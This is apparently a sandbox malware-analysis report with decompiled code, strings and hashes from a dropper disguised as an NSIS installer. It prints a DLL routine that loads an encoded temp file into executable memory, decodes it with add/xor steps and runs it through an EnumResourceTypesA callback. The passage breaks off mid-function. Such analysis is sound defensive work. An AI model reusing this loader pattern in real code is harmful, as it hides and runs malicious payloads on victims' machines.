"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 00402C68
C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
Error launching installer, xrefs: 00402CAB
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
p>u, xrefs: 00402EBD

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\sspgadrjncoy$C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$p>u$soft
API String ID: 2803837635-2094738190
Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\jones\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\jones\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}

APIs

lstrcatA.KERNEL32(00000000,00000000,xzfdi,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,xzfdi,xzfdi,00000000,00000000,xzfdi,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00405A92

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF

Strings

xzfdi, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp, xrefs: 0040177E, 004017ED, 0040180B
C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll, xrefs: 00401801, 0040181D
C:\Users\user\AppData\Local\Temp, xrefs: 00401761

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp$C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll$xzfdi
API String ID: 1941528284-4009907762
Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040302C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x50207
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					L2:
					_t12 =  *0x417040; // 0x4cef1
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					while(1) {
						_t46 =  *0x423eb0; // 0x753e70
						if(_t46 != 0) {
							_t47 =  *0x423f40; // 0x0
							if(_t47 == 0) {
								_t22 =  *0x41f048; // 0x32d2
								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
								E00402BC5(0);
							}
						}
						 *0x40afd0 = 0x40b038;
						 *0x40afd4 = 0x8000; // executed
						_t16 = E00405E9D(0x40afb0); // executed
						if(_t16 < 0) {
							break;
						}
						_t39 =  *0x40afd0; // 0x40e30a
						_t40 = _t39 - 0x40b038;
						if(_t40 == 0) {
							__eflags =  *0x40afcc; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t34;
							if(_t34 == 0) {
								break;
							}
							L17:
							_t18 =  *0x41703c; // 0x50207
							if(_t18 -  *0x40afa8 + _a4 > 0) {
								goto L2;
							}
							SetFilePointer( *0x409014, _t18, 0, 0); // executed
							goto L23;
						}
						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40afa8 =  *0x40afa8 + _t40;
							_t53 =  *0x40afcc; // 0x0
							if(_t53 != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

APIs

GetTickCount.KERNEL32 ref: 00403041

Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,0000B5E4), ref: 004031E8

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
WriteFile.KERNELBASE(0040B038,0040E30A,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
SetFilePointer.KERNELBASE(00050207,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180

Strings

@, xrefs: 004030FD, 00403116
80A, xrefs: 004030A1
p>u, xrefs: 004030C7

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: @$80A$p>u
API String ID: 2146148272-4220586700
Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423ef8; // 0x5c89
					_t44 = _t31 + _t51;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

APIs

SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402F28
ReadFile.KERNELBASE(00409128,00000004,0000B5E4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
ReadFile.KERNELBASE(00413038,00004000,0000B5E4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402FAF
WriteFile.KERNELBASE(00000000,00413038,0000B5E4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402FC7

Strings

80A, xrefs: 00402F8F

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: 80A
API String ID: 2113905535-195308239
Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 6F3A1070 Relevance: 9.2, APIs: 6, Instructions: 198
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E6F3A1070(void* __ebx) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				long _v44;
				short _v1084;
				void* _t97;
				void* _t100;
				signed int _t104;
				void* _t106;
				void* _t137;
				_Unknown_base(*)()* _t149;
				long _t187;

				_t137 = __ebx;
				_push(__ebx);
				_v40 = 0x74;
				_v38 = 0x61;
				_v36 = 0x75;
				_v34 = 0x64;
				_v32 = 0x6f;
				_v30 = 0x73;
				_v28 = 0x77;
				_v26 = 0x79;
				_v24 = 0x6f;
				_v22 = 0;
				GetTempPathW(0x103,  &_v1084);
				E6F3A1000( &_v1084,  &_v40);
				_t97 = CreateFileW( &_v1084, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v20 = _t97;
				_v16 = GetFileSize(_v20, 0);
				_t100 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
				_v12 = _t100;
				_t187 = _v16;
				ReadFile(_v20, _v12, _t187,  &_v44, 0); // executed
				_v8 = 0;
				while(_v8 < _v16) {
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x35;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xac;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000072;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000090;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x21;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xaf;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000e5;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000cb;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000061;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					_t187 = _v8 + 1;
					_v8 = _t187;
				}
				_t149 = _v12;
				_t104 = EnumResourceTypesA(0, _t149, 0); // executed
				_t106 = (_t104 ^ 0x0000620a) + 0x16054;
				if(_t137 + 0xb33a != 0x12f4f) {
					_t106 = _t106 + 0x17ef8;
					_t187 = _t187 - 1;
					_t149 = _t149 + 1;
				}
				return _t106;
			}

0x6f3a1070
0x6f3a1079
0x6f3a107f
0x6f3a1088
0x6f3a1091
0x6f3a109a
0x6f3a10a3
0x6f3a10ac
0x6f3a10b5
0x6f3a10be
0x6f3a10c7
0x6f3a10cd
0x6f3a10dd
0x6f3a10ee
0x6f3a110f
0x6f3a1115
0x6f3a1124
0x6f3a1134
0x6f3a113a
0x6f3a1143
0x6f3a114f
0x6f3a1155
0x6f3a1167
0x6f3a1185
0x6f3a119c
0x6f3a11b0
0x6f3a11c7
0x6f3a11db
0x6f3a11ee
0x6f3a1201
0x6f3a1218
0x6f3a122b
0x6f3a1242
0x6f3a1255
0x6f3a1268
0x6f3a127f
0x6f3a1293
0x6f3a12a6
0x6f3a1161
0x6f3a1164
0x6f3a1164
0x6f3a12af
0x6f3a12b5
0x6f3a12c0
0x6f3a12d1
0x6f3a12d3
0x6f3a12d8
0x6f3a12d9
0x6f3a12d9
0x6f3a12fb

APIs

GetTempPathW.KERNEL32(00000103,?), ref: 6F3A10DD
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F3A110F
GetFileSize.KERNEL32(?,00000000), ref: 6F3A111E
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6F3A1134
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 6F3A114F
EnumResourceTypesA.KERNEL32(00000000,?,00000000), ref: 6F3A12B5

Memory Dump Source

Source File: 00000005.00000002.719944705.000000006F3A1000.00000020.00020000.sdmp, Offset: 6F3A0000, based on PE: true

Associated: 00000005.00000002.719937800.000000006F3A0000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719950633.000000006F3A5000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f3a0000_rstmgknbahw.jbxd

Similarity

API ID: File$AllocCreateEnumPathReadResourceSizeTempTypesVirtual
String ID:
API String ID: 3718768629-0
Opcode ID: be7e9251c11e9f1769549620f1a829c2108ba45038764865b17aa26c8386d37e
Instruction ID: 75ff16cd27f862e41dfae0e242ac746cb7acd82f5557684f7f61a2250a0d4c3d
Opcode Fuzzy Hash: be7e9251c11e9f1769549620f1a829c2108ba45038764865b17aa26c8386d37e
Instruction Fuzzy Hash: B8913035908148EFDB05CBA8C991BEDBBB2EF5A308F1440D8D641AB392C6766F54DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
